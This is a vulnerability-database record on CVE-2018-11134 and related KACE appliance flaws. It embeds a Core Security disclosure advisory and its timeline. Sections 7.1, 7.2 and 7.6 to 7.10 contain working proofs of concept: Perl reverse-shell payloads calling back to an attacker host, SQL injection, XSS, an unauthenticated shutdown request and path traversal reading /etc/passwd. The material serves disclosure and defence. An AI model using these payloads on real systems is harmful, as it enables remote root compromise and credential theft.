/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0594",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11134"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11134",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11134",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11281",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11134",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11134",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11281",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1220",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-11134",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In order to perform actions that requires higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue managed that runs with root privileges and only allows a set of commands. One of the available commands allows changing any user\u0027s password (including root). A low-privilege user could abuse this feature by changing the password of the \u0027kace_support\u0027 account, which comes disabled by default but has full sudo privileges. Quest KACE System Management Appliance Contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A security vulnerability exists in the QuestKACESystemManagementAppliance 8.0.318 release. An attacker could use this vulnerability to change the \\342\\200\\230kace_support\\342\\200\\231 account password. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. \n\n7.5. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty 